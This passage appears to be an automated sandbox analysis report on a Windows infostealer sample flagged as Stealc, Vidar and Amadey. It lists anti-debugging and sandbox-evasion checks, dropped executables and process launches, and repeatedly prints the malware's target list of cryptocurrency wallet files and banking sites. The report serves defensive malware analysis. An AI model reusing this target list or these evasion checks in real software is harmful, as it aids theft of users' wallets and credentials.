Source: file.exe, 00000000.00000003.1743257678.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1979370069.0000000000B7F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743257678.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1979370069.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743257678.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000014.00000002.2647162838.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000014.00000002.2647162838.00000000009F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: BGCAFHCA.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: BGCAFHCA.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: BGCAFHCA.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: BGCAFHCA.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: BGCAFHCA.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: BGCAFHCA.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: BGCAFHCA.0.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: file.exe, 00000000.00000002.1978262092.0000000000611000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: iMSHN6QKQEMUh;=a
Source: BGCAFHCA.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: file.exe, 00000000.00000002.1978262092.0000000000611000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: MSHN6QKQEMU
Source: BGCAFHCA.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: BGCAFHCA.0.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: BGCAFHCA.0.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: file.exe, 00000000.00000002.1979370069.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: BGCAFHCA.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: BGCAFHCA.0.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: BGCAFHCA.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: BGCAFHCA.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: file.exe	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: BGCAFHCA.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: BGCAFHCA.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: BGCAFHCA.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: BGCAFHCA.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\Documents\JDGIECGIEB.exe

Code function: 16_2_04B20D06 Start: 04B20D57 End: 04B20D51

16_2_04B20D06

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Documents\JDGIECGIEB.exe

Code function: 16_2_04B20CA1 rdtsc

16_2_04B20CA1

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC1AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CC1AC62

Contains functionality to read the PEB

Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_0018652B mov eax, dword ptr fs:[00000030h]	16_2_0018652B
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_0018A302 mov eax, dword ptr fs:[00000030h]	16_2_0018A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005EA302 mov eax, dword ptr fs:[00000030h]	17_2_005EA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005E652B mov eax, dword ptr fs:[00000030h]	17_2_005E652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005EA302 mov eax, dword ptr fs:[00000030h]	18_2_005EA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005E652B mov eax, dword ptr fs:[00000030h]	18_2_005E652B

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC1AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CC1AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7560, type: MEMORYSTR

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\JDGIECGIEB.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\JDGIECGIEB.exe "C:\Users\user\Documents\JDGIECGIEB.exe"	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_6CC64760

Source: C:\Users\user\Desktop\file.exe

0_2_6CB41C30

Source: file.exe, file.exe, 00000000.00000002.1978921655.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager
Source: skotes.exe, skotes.exe, 00000012.00000002.2063786095.00000000007DC000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000014.00000002.2645875194.00000000007DC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: (Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC1AE71 cpuid

0_2_6CC1AE71

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC1A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CC1A8DC

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB68390 NSS_GetVersion,

0_2_6CB68390

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 18.2.skotes.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.skotes.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.skotes.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.JDGIECGIEB.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2062939332.00000000005B1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2050408210.00000000005B1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2019078074.0000000000151000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2644831254.00000000005B1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1979370069.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1978262092.0000000000611000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7560, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7560, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx 